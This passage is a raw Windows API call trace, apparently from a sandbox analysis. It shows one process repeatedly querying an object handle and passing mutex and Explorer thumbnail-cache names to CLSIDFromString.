ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.603] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x70) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x62, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.604] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.604] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.604] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.609] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.609] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.609] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.609] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.609] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.610] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.611] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.611] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.611] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.611] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.611] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.612] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.612] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.612] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.614] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.614] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.614] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.614] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.614] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.614] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x82, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.615] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.615] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.615] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.616] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.616] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.616] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.616] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.618] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.618] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.618] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.619] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.619] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.619] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.619] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.619] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.619] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.619] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.619] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.620] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.620] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.620] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.620] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.620] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.620] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.620] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.620] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.622] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.622] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.622] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.622] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.622] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.622] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.623] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.623] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.623] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.623] CLSIDFromString (in: lpsz="_!SHMSFTHISTORY!_", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.623] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.623] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.624] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.624] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.624] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.624] 